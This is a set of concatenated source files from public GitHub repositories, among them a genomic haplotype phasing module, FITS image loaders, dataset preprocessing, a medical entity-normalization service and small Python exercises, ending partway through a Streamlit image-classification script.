var_reads]\n if len(hap_reads_contain_var) < 3:\n hap_reads_contain_var += [\n var_reads[a] for a in hap_reads_nonunique if a in var_reads\n ]\n if len(hap_reads_contain_var) >= 3:\n hap_reads_contain_var_counter = Counter(hap_reads_contain_var).most_common(\n 2\n )\n if len(hap_reads_contain_var_counter) == 1 or hap_reads_contain_var_counter[\n 1\n ][1] <= min(hap_reads_contain_var_counter[0][1] * 0.15, 2):\n if hap_reads_contain_var_counter[0][0] == \"alt\":\n return \"1\"\n elif hap_reads_contain_var_counter[0][0] == \"ref\":\n return \"0\"\n return \".\"\n\n @staticmethod\n def update_reads_for_deletions(\n raw_read_haps, het_sites, n1, n2, del_reads_partial, base, del_name\n ):\n \"\"\"\n For reads carrying known big deletions, update read haplotype to\n 
reflect the deletion. This is needed for downstream phasing\n \"\"\"\n pos1 = -1\n pos2 = -1\n for i, var in enumerate(het_sites):\n if int(var.split(\"_\")[0]) > n1:\n pos1 = i\n break\n for i, var in enumerate(het_sites):\n if int(var.split(\"_\")[0]) > n2:\n pos2 = i\n break\n if pos1 != -1 and pos2 != -1:\n if pos1 < pos2:\n for read in del_reads_partial:\n if read in raw_read_haps:\n hap = list(raw_read_haps[read])\n for i in range(pos1, pos2):\n hap[i] = base\n raw_read_haps[read] = \"\".join(hap)\n elif pos1 == pos2:\n het_sites.insert(pos1, del_name)\n for read in raw_read_haps:\n hap = list(raw_read_haps[read])\n hap.insert(pos1, \"x\")\n if read in del_reads_partial:\n hap[pos1] = base\n elif (\n hap[pos1 - 1] == \"0\"\n and pos1 - 1 >= 0\n and hap[pos1 + 1] == \"0\"\n and pos1 + 1 < len(hap)\n ):\n hap[pos1] = \"0\"\n else:\n flanking_left = hap[max(0, pos1 - 2) : pos1]\n flanking_right = hap[\n min(pos1 + 1, len(hap)) : min(pos1 + 3, len(hap))\n ]\n if \"x\" not in flanking_left and \"x\" not in flanking_right:\n hap[pos1] = \"1\"\n raw_read_haps[read] = \"\".join(hap)\n return raw_read_haps, het_sites\n\n def get_read_counts(self, uniquely_supporting_haps):\n \"\"\"\n Get unique supporting read counts for each haplotype\n \"\"\"\n if uniquely_supporting_haps == {}:\n return {}\n nhap = len(uniquely_supporting_haps)\n nvar = len(self.het_sites)\n hap_bases = []\n for i in range(nhap):\n hap_bases.append([])\n j = 0\n for hap in uniquely_supporting_haps:\n reads = uniquely_supporting_haps[hap]\n for i in range(nvar):\n bases = [a[i] for a in reads]\n hap_bases[j].append(len(bases) - bases.count(\"x\"))\n j += 1\n ranges = []\n for i in range(nvar):\n if min([hap_bases[a][i] for a in range(nhap)]) >= 5:\n for j in range(nvar):\n if j > i:\n if min([hap_bases[a][j] for a in range(nhap)]) < 5:\n ranges.append([i, j])\n break\n if j == nvar - 1 and j > i:\n ranges.append([i, nvar - 1])\n if ranges == []:\n return None\n longest_range = sorted(ranges, key=lambda x: x[1] - x[0], reverse=True)[0]\n mid = int((longest_range[1] + longest_range[0]) / 2)\n nstart = max(mid - 1, longest_range[0])\n nend = min(mid + 1, longest_range[1])\n if nend == nstart:\n return None\n\n read_count = {}\n for hap in uniquely_supporting_haps:\n reads = uniquely_supporting_haps[hap]\n lreads = [a for a in reads if a[nstart:nend] != \"x\" * (nend - nstart)]\n read_count.setdefault(hap, len(lreads))\n return read_count\n\n def phase_haps(self, raw_read_haps, min_support=4, debug=False):\n \"\"\"\n Assemble and evaluate haplotypes\n \"\"\"\n het_sites = self.het_sites\n haplotypes_to_reads, raw_read_haps = self.simplify_read_haps(raw_read_haps)\n\n ass_haps = []\n original_haps = []\n nvar = len(het_sites)\n hcn = 0\n if nvar == 0:\n return ([], [], 0, {}, {}, {}, None)\n elif nvar == 1:\n ass_haps = [\"1\", \"2\"]\n original_haps = [\"1\", \"2\"]\n else:\n pivot_index, _ = self.get_pivot_site_index()\n hap_graph = VariantGraph(\n raw_read_haps, pivot_index, figure_id=self.sample_id\n )\n ass_haps, original_haps, hcn = hap_graph.run(debug=debug, make_plot=debug)\n\n if ass_haps == []:\n return (ass_haps, original_haps, hcn, {}, {}, raw_read_haps, None)\n\n (\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n read_counts,\n ) = self.get_read_support(raw_read_haps, haplotypes_to_reads, ass_haps)\n\n # remove spurious ones\n ass_haps = self.adjust_spurious_haplotypes(uniquely_supporting_reads)\n (\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n read_counts,\n ) = 
self.get_read_support(raw_read_haps, haplotypes_to_reads, ass_haps)\n\n # remove low-support ones\n ass_haps = [\n a\n for a in uniquely_supporting_reads\n if len(uniquely_supporting_reads[a]) >= min_support\n ]\n (\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n read_counts,\n ) = self.get_read_support(raw_read_haps, haplotypes_to_reads, ass_haps)\n\n return (\n ass_haps,\n original_haps,\n hcn,\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n raw_read_haps,\n read_counts,\n )\n\n def get_read_support(self, raw_read_haps, haplotypes_to_reads, ass_haps):\n \"\"\"Find uniquely and nonuniquely supporting reads for given haplotypes\"\"\"\n read_support = VariantGraph.match_reads_and_haplotypes(raw_read_haps, ass_haps)\n uniquely_supporting_haps = read_support.unique\n read_counts = self.get_read_counts(uniquely_supporting_haps)\n\n uniquely_supporting_reads = {}\n for hap in ass_haps:\n uniquely_supporting_reads.setdefault(hap, [])\n for hap in uniquely_supporting_haps:\n for read_hap in uniquely_supporting_haps[hap]:\n uniquely_supporting_reads[hap] += haplotypes_to_reads[read_hap]\n for hap in uniquely_supporting_haps:\n uniquely_supporting_reads[hap] = list(set(uniquely_supporting_reads[hap]))\n\n nonuniquely_supporting_reads = {}\n for read in read_support.by_read:\n num_matches = len(read_support.by_read[read])\n if num_matches > 1:\n nonuniquely_supporting_reads.setdefault(\n read, read_support.by_read[read]\n )\n return (\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n read_counts,\n )\n\n def compare_depth(self, haplotypes, loose=False):\n \"\"\"\n For each haplotype, identify the variants where it's different\n from other haplotypes. Check depth at those variant sites and\n see if the depth suggests twice coverage.\n \"\"\"\n if haplotypes is None or len(haplotypes) == 1:\n return []\n two_cp_haps = []\n bamh = self._bamh\n boundaries = [haplotypes[a][\"boundary\"] for a in haplotypes]\n nstart = max([a[0] for a in boundaries])\n nend = min(a[1] for a in boundaries)\n variants = set()\n for hap in haplotypes:\n vars = haplotypes[hap][\"variants\"]\n for var in vars:\n if len(var.split(\"_\")) == 3:\n pos, ref, alt = var.split(\"_\")\n pos = int(pos)\n if nstart < pos < nend and var in self.het_sites:\n variants.add(var)\n\n for hap in haplotypes:\n sites = {}\n other_haps = [a for a in haplotypes.keys() if a != hap]\n other_cn = len(other_haps)\n this_hap_var = haplotypes[hap][\"variants\"]\n other_haps_var = []\n for a in other_haps:\n other_haps_var += haplotypes[a][\"variants\"]\n for var in variants:\n pos, ref, alt = var.split(\"_\")\n pos = int(pos)\n if var in this_hap_var and var not in other_haps_var:\n sites.setdefault(pos, alt)\n elif var not in this_hap_var and other_haps_var.count(var) == other_cn:\n sites.setdefault(pos, ref)\n\n counts = []\n for pos in sites:\n hap_base = sites[pos]\n for pileupcolumn in bamh.pileup(\n self.nchr,\n pos - 1,\n pos,\n truncate=True,\n min_base_quality=self.MEAN_BASE_QUAL,\n ):\n bases = [a.upper() for a in pileupcolumn.get_query_sequences()]\n base_num = bases.count(hap_base)\n counts.append([base_num, len(bases) - base_num])\n\n probs = []\n nsites = len(sites)\n for n1, n2 in counts:\n probs.append(self.depth_prob(n1, n2 / other_cn))\n probs_fil = [a for a in probs if a[0] < 0.25]\n if len(probs_fil) >= nsites * 0.6 and nsites >= 5:\n two_cp_haps.append(hap)\n elif loose is True:\n if len(probs_fil) >= nsites * 0.5 and nsites >= 5:\n two_cp_haps.append(hap)\n\n return two_cp_haps\n\n def 
adjust_spurious_haplotypes(self, uniquely_supporting_reads, flanking_bp=10):\n \"\"\"Identify spurious haplotypes caused by locally misaligned reads\"\"\"\n passing_haplotypes = list(uniquely_supporting_reads.keys())\n suspicious_hap_pair = []\n lhap = uniquely_supporting_reads.keys()\n for hap1 in lhap:\n for hap2 in lhap:\n if hap1 != hap2:\n nmatch = 0\n nmismatch = 0\n mismatch_sites = []\n for i, base1 in enumerate(hap1):\n base2 = hap2[i]\n if \"x\" not in [base1, base2]:\n if base1 == base2:\n nmatch += 1\n elif base1 in [\"1\", \"2\"] and base2 in [\"1\", \"2\"]:\n nmismatch += 1\n mismatch_sites.append(self.het_sites[i])\n if nmatch >= 5 and nmismatch == 1 and len(mismatch_sites) == 1:\n mismatch_pos = int(mismatch_sites[0].split(\"_\")[0])\n hap1_reads = uniquely_supporting_reads[hap1]\n hap2_reads = uniquely_supporting_reads[hap2]\n hap_pair = None\n if len(hap1_reads) <= 5 and len(hap2_reads) >= 6:\n hap_pair = [hap2, hap1]\n elif len(hap2_reads) <= 5 and len(hap1_reads) >= 6:\n hap_pair = [hap1, hap2]\n if (\n hap_pair is not None\n and [\n hap_pair,\n mismatch_pos,\n ]\n not in suspicious_hap_pair\n ):\n suspicious_hap_pair.append([hap_pair, mismatch_pos])\n\n for hap_pair, mismatch_pos in suspicious_hap_pair:\n hap1, hap2 = hap_pair\n hap1_reads = uniquely_supporting_reads[hap1]\n hap2_reads = uniquely_supporting_reads[hap2]\n hap1_reads_at_pos = []\n hap2_reads_at_pos = []\n for pileupcolumn in self._bamh.pileup(\n self.nchr,\n mismatch_pos - 1,\n mismatch_pos,\n truncate=True,\n min_base_quality=self.MEAN_BASE_QUAL,\n ):\n for read in pileupcolumn.pileups:\n if not read.is_del and not read.is_refskip:\n read_name = read.alignment.query_name\n read_seq = read.alignment.query_sequence\n read_pos = read.query_position\n if (\n read_name in hap1_reads + hap2_reads\n and read_pos >= flanking_bp\n and read_pos + flanking_bp < len(read_seq)\n ):\n start_pos = read_pos - flanking_bp\n end_pos = read_pos + flanking_bp\n if read_name in hap1_reads:\n hap1_reads_at_pos.append(read_seq[start_pos:end_pos])\n if read_name in hap2_reads:\n hap2_reads_at_pos.append(read_seq[start_pos:end_pos])\n\n if set(hap1_reads_at_pos).intersection(set(hap2_reads_at_pos)) != set():\n passing_haplotypes.remove(hap2)\n return passing_haplotypes\n\n @staticmethod\n def check_linking_read(aln1, aln2, reverse=False):\n \"\"\"Determine the direction of links between two alignments\"\"\"\n if reverse is False:\n if aln1[-1] != \"x\" and aln2[0] != \"x\":\n return \"1-2\"\n if aln2[-1] != \"x\" and aln1[0] != \"x\":\n return \"2-1\"\n else:\n if aln1[-1] != \"x\" and aln2[-1] != \"x\":\n return \"0-0\"\n if aln1[0] != \"x\" and aln2[0] != \"x\":\n return \"0-0\"\n return None\n\n def phase_alleles(\n self,\n uniq_reads,\n nonuniquely_supporting_reads,\n raw_read_haps,\n ass_haps,\n reverse=False,\n min_read=2,\n ):\n \"\"\"\n Phase haplotypes into alleles using read evidence\n \"\"\"\n new_reads = {}\n # unique\n for hap in uniq_reads:\n for read in uniq_reads[hap]:\n short_name = read.split(\"_sup\")[0]\n new_reads.setdefault(short_name, []).append({read: [hap]})\n # nonunique\n for read, supported_haps in nonuniquely_supporting_reads.items():\n short_name = read.split(\"_sup\")[0]\n new_reads.setdefault(short_name, []).append({read: supported_haps})\n\n (\n nondirected_links,\n directed_links,\n directed_links_loose,\n ) = self.get_directed_links(new_reads, raw_read_haps, ass_haps, reverse)\n\n read_links = {}\n for hap_link in nondirected_links:\n if len(nondirected_links[hap_link]) >= min_read:\n hap1, 
hap2 = hap_link.split(\"-\")\n read_links.setdefault(hap1, []).append(hap2)\n read_links.setdefault(hap2, []).append(hap1)\n read_links = dict(\n sorted(read_links.items(), key=lambda item: len(item[1]), reverse=True)\n )\n alleles = Phaser.get_alleles_from_links(read_links, ass_haps.values())\n return (\n alleles,\n read_links,\n {a: len(b) for a, b in directed_links.items()},\n {a: Counter(b) for a, b in directed_links_loose.items()},\n )\n\n def get_directed_links(self, new_reads, raw_read_haps, ass_haps, reverse):\n \"\"\"Get links between haplotypes from reads\"\"\"\n nondirected_links = {}\n directed_links = {}\n directed_links_loose = {}\n for read, hap_info in new_reads.items():\n nsegment = len(hap_info)\n if nsegment >= 2:\n links_found = set()\n for i in range(nsegment):\n for j in range(i + 1, nsegment):\n hap_info1 = hap_info[i]\n hap_info2 = hap_info[j]\n read1, haps1 = list(hap_info1.items())[0]\n read2, haps2 = list(hap_info2.items())[0]\n aln1 = raw_read_haps[read1]\n aln2 = raw_read_haps[read2]\n check_link = self.check_linking_read(aln1, aln2, reverse)\n if len(haps1) == 1 and len(haps2) == 1:\n hap1 = haps1[0]\n hap2 = haps2[0]\n if hap1 != hap2:\n hap1_renamed = ass_haps[hap1]\n hap2_renamed = ass_haps[hap2]\n link_to_add = f\"{hap1_renamed}-{hap2_renamed}\"\n if link_to_add not in links_found:\n links_found.add(link_to_add)\n nondirected_links.setdefault(\n link_to_add, []\n ).append(1)\n if check_link is not None and check_link in [\n \"1-2\",\n \"0-0\",\n ]:\n directed_links.setdefault(\n f\"{hap1_renamed}-{hap2_renamed}\", []\n ).append(1)\n directed_links_loose.setdefault(\n hap1_renamed, []\n ).append(hap2_renamed)\n elif check_link is not None and check_link in [\n \"2-1\",\n \"0-0\",\n ]:\n directed_links.setdefault(\n f\"{hap2_renamed}-{hap1_renamed}\", []\n ).append(1)\n directed_links_loose.setdefault(\n hap2_renamed, []\n ).append(hap1_renamed)\n elif len(haps1) == 1 or len(haps2) == 1:\n for hap1 in haps1:\n for hap2 in haps2:\n if hap1 != hap2:\n hap1_renamed = ass_haps[hap1]\n hap2_renamed = ass_haps[hap2]\n if check_link is not None and check_link in [\n \"1-2\",\n \"0-0\",\n ]:\n directed_links_loose.setdefault(\n hap1_renamed, []\n ).append(hap2_renamed)\n elif check_link is not None and check_link in [\n \"2-1\",\n \"0-0\",\n ]:\n directed_links_loose.setdefault(\n hap2_renamed, []\n ).append(hap1_renamed)\n return nondirected_links, directed_links, directed_links_loose\n\n @staticmethod\n def get_alleles_from_links(read_links, total_haps):\n \"\"\"phase alleles from read_links between reads\"\"\"\n alleles = []\n if read_links != {}:\n alleles = [[list(read_links.keys())[0]] + list(read_links.values())[0]]\n for hap1 in read_links:\n for hap2 in read_links[hap1]:\n hap1_in = sum([hap1 in a for a in alleles])\n hap2_in = sum([hap2 in a for a in alleles])\n if hap1_in == 0 and hap2_in == 0:\n alleles.append([hap1, hap2])\n elif hap1_in == 0:\n for a in alleles:\n if hap2 in a:\n a_index = alleles.index(a)\n if hap1 not in alleles[a_index]:\n alleles[a_index].append(hap1)\n if hap2 not in alleles[a_index]:\n alleles[a_index].append(hap2)\n else:\n for a in alleles:\n if hap1 in a:\n a_index = alleles.index(a)\n if hap2 not in alleles[a_index]:\n alleles[a_index].append(hap2)\n if hap1 not in alleles[a_index]:\n alleles[a_index].append(hap1)\n # merge alleles\n while True:\n to_merge = []\n for hap in total_haps:\n hap_found_in_alleles = [hap in a for a in alleles]\n if hap_found_in_alleles.count(True) > 1:\n to_merge.append(hap)\n break\n if to_merge 
== []:\n break\n new_alleles = []\n hap = to_merge[0]\n merged = []\n for each_allele in alleles:\n if hap not in each_allele:\n new_alleles.append(each_allele)\n else:\n merged += each_allele\n merged = list(set(merged))\n new_alleles.append(merged)\n alleles = new_alleles\n return alleles\n\n def call(self):\n \"\"\"Main function to phase haplotypes and call copy numbers\"\"\"\n if self.check_coverage_before_analysis() is False:\n return self.GeneCall()\n self.get_homopolymer()\n self.get_candidate_pos()\n self.het_sites = sorted(list(self.candidate_pos))\n self.remove_noisy_sites()\n\n raw_read_haps = self.get_haplotypes_from_reads()\n\n (\n ass_haps,\n original_haps,\n hcn,\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n raw_read_haps,\n read_counts,\n ) = self.phase_haps(raw_read_haps)\n\n tmp = {}\n mod_gene_name = \",\".join(self.gene.split(\"-\"))\n for i, hap in enumerate(ass_haps):\n tmp.setdefault(hap, f\"{mod_gene_name}_hap{i+1}\")\n ass_haps = tmp\n\n haplotypes = None\n dvar = None\n if ass_haps != {}:\n haplotypes, dvar = self.output_variants_in_haplotypes(\n ass_haps,\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n )\n\n two_cp_haps = self.compare_depth(haplotypes)\n total_cn = len(ass_haps) + len(two_cp_haps)\n\n # phase\n alleles = []\n hap_links = {}\n if self.to_phase is True:\n (\n alleles,\n hap_links,\n _,\n _,\n ) = self.phase_alleles(\n uniquely_supporting_reads,\n nonuniquely_supporting_reads,\n raw_read_haps,\n ass_haps,\n reverse=self.is_reverse,\n )\n self.close_handle()\n\n return self.GeneCall(\n total_cn,\n None,\n ass_haps,\n two_cp_haps,\n alleles,\n hap_links,\n hcn,\n original_haps,\n self.het_sites,\n uniquely_supporting_reads,\n self.het_no_phasing,\n self.homo_sites,\n haplotypes,\n dvar,\n nonuniquely_supporting_reads,\n raw_read_haps,\n self.mdepth,\n )\n\n def close_handle(self):\n self._bamh.close()\n self._refh.close()\n","repo_name":"PacificBiosciences/paraphase","sub_path":"paraphase/phaser.py","file_name":"phaser.py","file_ext":"py","file_size_in_byte":55387,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"71"} +{"seq_id":"17917470597","text":"__all__ = ['BenchmarkImage',\n 'benchmark_image_generator',\n 'load_benchmark_images']\n\nfrom astropy.io import fits\n\nimport collections\n\nimport numpy as np\n\nfrom pywi.io.images import image_files_in_paths\n\n\n# IMAGE OBJECT ###############################################################\n\nBenchmarkImage = collections.namedtuple('BenchmarkImage', ('input_image',\n 'reference_image',\n 'metadata'))\n\n\n# IMAGE GENERATOR ############################################################\n\ndef benchmark_image_generator(path_list,\n max_num_images=None,\n **kwargs):\n \"\"\"Return an iterable sequence all calibrated images in `path_list`.\n\n Parameters\n ----------\n path_list\n The path of files containing the images to extract. 
It can contain\n        FITS/Simtel files and directories.\n    max_num_images\n        The maximum number of images to iterate.\n\n    Yields\n    ------\n    Image1D or Image2D\n        The named tuple `Image1D` or `Image2D` of the next FITS or Simtel file\n        in `path_list`.\n    \"\"\"\n\n    images_counter = 0\n\n    for file_path in image_files_in_paths(path_list):\n        if (max_num_images is not None) and (images_counter >= max_num_images):\n            break\n        else:\n            if file_path.lower().endswith((\".fits\", \".fit\")):\n                # FITS FILES\n                benchmark_image = load_benchmark_images(file_path)\n                images_counter += 1\n                yield benchmark_image\n            else:\n                raise Exception(\"Wrong item:\", file_path)\n\n\n# LOAD FITS BENCHMARK IMAGE ##################################################\n\ndef load_benchmark_images(file_path):\n    \"\"\"Return images contained in the given FITS file.\n\n    Parameters\n    ----------\n    file_path : str\n        The path of the FITS file to load\n\n    Returns\n    -------\n    dict\n        A dictionary containing the loaded images and their metadata\n\n    Raises\n    ------\n    WrongFitsFileStructure\n        If `file_path` doesn't contain a valid structure\n    \"\"\"\n\n    hdu_list = fits.open(file_path)   # open the FITS file\n\n    # METADATA ################################################################\n\n    hdu0 = hdu_list[0]\n\n    metadata = {}\n\n    for key, val in hdu0.header.items():\n        metadata[key] = val\n\n    # IMAGES ##################################################################\n\n    if (len(hdu_list) != 2) or (not hdu_list[0].is_image) or (not hdu_list[1].is_image):\n        hdu_list.close()\n        raise WrongFitsFileStructure(file_path)\n\n    hdu0, hdu1 = hdu_list\n\n    input_image = hdu0.data        # \"hdu.data\" is a Numpy Array\n    reference_image = hdu1.data    # \"hdu.data\" is a Numpy Array\n\n    hdu_list.close()\n\n    benchmark_image = BenchmarkImage(input_image=input_image,\n                                     reference_image=reference_image,\n                                     metadata=metadata)\n\n    return benchmark_image\n","repo_name":"jeremiedecock/pywi","sub_path":"pywi/benchmark/io/refbased/fits.py","file_name":"fits.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"73589961830","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\n\n\n\nSEED = 2\n\ndef one_hot_df(df, scaler=None, test=False, discrete=False):\n    df_cols = df.select_dtypes('object')\n    df_1 = df.drop(columns = df_cols).drop(columns = ['target'])\n    if scaler:\n        if test:\n            df_1 = pd.DataFrame(scaler.transform(df_1.values))\n        else:\n            df_1 = pd.DataFrame(scaler.fit_transform(df_1.values))\n    df_2 = pd.get_dummies(df[list(df_cols)])\n    \n    if discrete:\n        return pd.concat([df_2, df[['target']]], axis=1) \n    \n    return (pd.concat([df_1, df_2, df[['target']]], axis=1))\n\ndef get_hepatitis_dataframes(discrete=False):\n    df = pd.read_csv('data/hepatitis.data', header=None).rename(columns = {0:'target'})\n    df.target = df.target.apply(lambda x: 1 if x==1 else -1)\n    df=one_hot_df(df, discrete=discrete)\n    df_train, df_test = train_test_split(df, random_state=SEED)\n    return df_train, df_test\n\ndef get_votes_dataframes():\n    df = pd.read_csv('data/house-votes-84.data', header=None).rename(columns = {0:'target'})\n    df.target = df.target.apply(lambda x: 1 if x=='democrat' else -1)\n    df=one_hot_df(df)\n    df_train, df_test = train_test_split(df, random_state=SEED)\n    return df_train, df_test\n\ndef get_kr_kp_dataframes():\n    df = pd.read_csv('data/kr-vs-kp.data', header=None).rename(columns = {36:'target'})\n    
df.target = df.target.apply(lambda x: 1 if x=='won' else -1)\n df=one_hot_df(df)\n df_train, df_test = train_test_split(df, random_state=SEED)\n return df_train, df_test\n\ndef get_prometers_dataframes(discrete=False):\n df = pd.read_csv('data/promoters.data', header=None).drop(columns=[0]).rename(columns = {58:'target'})\n df.target = df.target.apply(lambda x: 1 if x=='+' else -1)\n df = one_hot_df(df, discrete=discrete)\n df_train, df_test = train_test_split(df, random_state=SEED)\n return df_train, df_test\n\ndef get_credits_dataframes(discrete=False):\n df = pd.read_csv('data/crx.data', header=None).rename(columns = {15:'target'})\n df[1]=df[1].replace('?', '0').apply(eval)\n df.target = df.target.apply(lambda x: 1 if x=='+' else -1)\n df=one_hot_df(df, discrete=discrete)\n df_train, df_test = train_test_split(df, random_state=SEED)\n return df_train, df_test\n\ndef get_adults_dataframes(discrete=False):\n column_names = ['age', 'workclass', 'fnlwgt', 'education', 'educational-num',\\\n 'marital-status', 'occupation', 'relationship', 'race',\\\n 'gender','capital-gain', 'capital-loss', 'hours-per-week', 'native-country','income']\n df_train = pd.read_csv('data/adult.data', header=None).rename(columns = {14:'target'})\n df_train.target = df_train.target.apply(lambda x: 1 if x==' >50K' else -1)\n \n df_test = pd.read_csv('data/adult.test', skiprows=1, header=None).rename(columns = {14:'target'})\n df_test.target = df_test.target.apply(lambda x: 1 if x==' >50K.' else -1)\n \n scaler = StandardScaler()\n \n df_train = one_hot_df(df_train, scaler, discrete=discrete)\n df_train = df_train.drop(columns = ['13_ Holand-Netherlands'])\n \n df_test = one_hot_df(df_test, scaler, test=True, discrete=discrete)\n \n return df_train, df_test\n\ndef split_dataframe(df):\n return df.drop(columns=['target']).values, df['target'][:, None]\n\ndef get_train_test(df_train, df_test):\n X_train, y_train = split_dataframe(df_train)\n X_test, y_test = split_dataframe(df_test)\n \n return X_train, y_train, X_test, y_test\n\ndef get_dataset(name, discrete=False):\n if name=='adult':\n df_train, df_test = get_adults_dataframes(discrete=discrete) \n elif name=='credits':\n df_train, df_test = get_credits_dataframes(discrete=discrete)\n elif name=='kr-vs-kp':\n df_train, df_test = get_kr_kp_dataframes()\n elif name=='promoters':\n df_train, df_test = get_prometers_dataframes()\n elif name=='votes':\n df_train, df_test = get_votes_dataframes()\n elif name=='hepatitis':\n df_train, df_test = get_hepatitis_dataframes(discrete=discrete)\n \n X_train, y_train, X_test, y_test = get_train_test(df_train, df_test)\n return X_train, y_train, X_test, y_test","repo_name":"KaloshinPE/MEM_detector","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"7597374276","text":"# -*- coding:utf-8 -*-\nimport json\nimport pickle\nimport random\n\nimport tensorflow as tf\n\nfrom entity_normalization.esim import ESIM\nfrom entity_normalization.data_helper import pad_sequences\nfrom entity_normalization.bm25_retrival import BM25Retrieval\nfrom keras.backend.tensorflow_backend import set_session\nfrom entity_normalization.config import data_params, esim_params, MODEL_DIR\n\n\nclass EntityMatch(object):\n def __init__(self, kb_path):\n super(EntityMatch, self).__init__()\n self.kb_path = kb_path\n self.bm25re = BM25Retrieval(self.kb_path)\n\n self.word2idx, _ = 
pickle.load(open(esim_params['word2id'], \"rb\"))\n        self.model = ESIM(esim_params).build()\n        self.model.load_weights(esim_params['model_save_path'])\n\n    def char_index(self, p_sentences, h_sentences):\n        p_list, h_list = [], []\n        for p_sentence, h_sentence in zip(p_sentences, h_sentences):\n            p = [self.word2idx[word.lower()] for word in p_sentence if\n                 len(word.strip()) > 0 and word.lower() in self.word2idx.keys()]\n            h = [self.word2idx[word.lower()] for word in h_sentence if\n                 len(word.strip()) > 0 and word.lower() in self.word2idx.keys()]\n\n            p_list.append(p)\n            h_list.append(h)\n\n        p_list = pad_sequences(p_list, maxlen=esim_params['input_shapes'][0][0])\n        h_list = pad_sequences(h_list, maxlen=esim_params['input_shapes'][0][0])\n\n        return p_list, h_list\n\n    def predict(self, query):\n        cand_docs = self.bm25re.retrieval(query, 20)\n        querys = [query] * len(cand_docs)\n\n        p, h = self.char_index(querys, cand_docs)\n\n        scores = self.model.predict([p, h])\n        scores = scores[:, 1]\n        match_score = {e: s for e, s in zip(cand_docs, scores)}\n        match_score = sorted(match_score.items(), key=lambda x: x[1], reverse=True)\n        return match_score[0], cand_docs\n\n\nclass Entity_Normalization(object):\n    def __init__(self):\n        super(Entity_Normalization, self).__init__()\n        self.model = EntityMatch(data_params['code_file'])\n\n    def predict(self, texts, threshold=0.8):\n        if isinstance(texts, str):\n            pred, cand_docs = self.model.predict(texts)\n            if pred[1] > threshold:\n                return pred[0]\n            else:\n                return texts\n\n        elif isinstance(texts, list):\n            results = []\n            for text in texts:\n                pred, cand_docs = self.model.predict(text)\n                if pred[1] > threshold:\n                    results.append(pred[0])\n                else:\n                    results.append(text)\n            return results\n\n        else:\n            return \"Unsupported input type!\"\n\n\ndef BD_search(word):\n    file_path = MODEL_DIR + \"alias_dict.json\"\n    with open(file_path, 'r') as f:\n        data = json.load(f)\n\n    if word in data.keys():\n        return random.choice(data[word])\n    else:\n        return None\n\n\nglobal graph, sess\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\ngraph = tf.get_default_graph()\nset_session(sess)\n\nEMM = Entity_Normalization()\n\n\ndef EMM_model(word, e_type=\"disease\"):\n    \"\"\"\n    function: entity normalization\n    adds BD_search to improve the normalization results\n    e_type: the entity type to normalize, TODO\n    \"\"\"\n    bd_ans = BD_search(word)\n    if bd_ans:\n        return bd_ans\n\n    with graph.as_default():\n        set_session(sess)\n        result = EMM.predict(word)\n    return result\n\n\nif __name__ == '__main__':\n    while True:\n        text = input(\"Enter input: \")\n        with graph.as_default():\n            set_session(sess)\n            result = EMM.predict(text)\n        print(result)\n","repo_name":"loveleaves/Medical_ChatBot","sub_path":"Web_Font&server/entity_normalization/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21951106678","text":"# Assignment 2_3\t\tFactorial\r\n\r\ndef Fact(value):\r\n\tans=1\r\n\ti=0;\r\n\tfor i in range(value):\r\n\t\tans = value*ans\r\n\t\tvalue =value-1\r\n\treturn ans\r\n\r\ndef main ():\r\n\tcount=int(input(\"Enter the number for factorial : \")) \r\n\tret=Fact(count)\r\n\tprint(ret)\r\n\t\r\nif __name__==\"__main__\":\r\n\tmain();\t\t","repo_name":"Abhijeet-Kalathil-1000/Python","sub_path":"Python/Application/Factorial.py","file_name":"Factorial.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"72654291429","text":"#Number of 
components of both vectors\nn = int(input())\n\n#Vector 1\nvec1 = input()\nvec1 = vec1.split(\" \")\nvec1 = [int(x) for x in vec1]\n\n#Vector 2\nvec2 = input()\nvec2 = vec2.split(\" \")\nvec2 = [int(x) for x in vec2]\n\n#Initialize an accumulator\nproductoPunto = 0\n\n#Add the products of the vectors' components to the accumulator\nfor i, componente in enumerate(vec1):\n    productoPunto = productoPunto + vec1[i]*vec2[i]\n\nprint(productoPunto)","repo_name":"IYahirMP/ProgramacionOct22","sub_path":"Basic level/Producto punto de dos vectores/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"32002789234","text":"#https://github.com/streamlit/streamlit/issues/511\r\n#pip install --upgrade protobuf\r\n#pip install streamlit\r\n\r\nimport streamlit as st\r\nimport cv2 \r\nimport numpy as np\r\nimport pandas as pd\r\nfrom PIL import Image,ImageEnhance\r\n\r\nfrom tensorflow.keras.preprocessing.image import load_img\r\nfrom tensorflow.keras.preprocessing.image import img_to_array\r\nfrom keras.applications.imagenet_utils import decode_predictions\r\nimport time\r\n\r\n\r\n# import the models for further classification experiments\r\nfrom tensorflow.keras.applications import (\r\n    vgg16,\r\n    resnet50,\r\n    mobilenet,\r\n    inception_v3\r\n    )\r\n\r\nimport matplotlib.pyplot as plt\r\n\r\n# imports for reproducibility\r\nimport tensorflow as tf\r\nimport random\r\nimport os\r\n\r\ndef vgg16_predict(cam_frame, image_size):\r\n    frame= cv2.resize(cam_frame, (image_size, image_size))\r\n    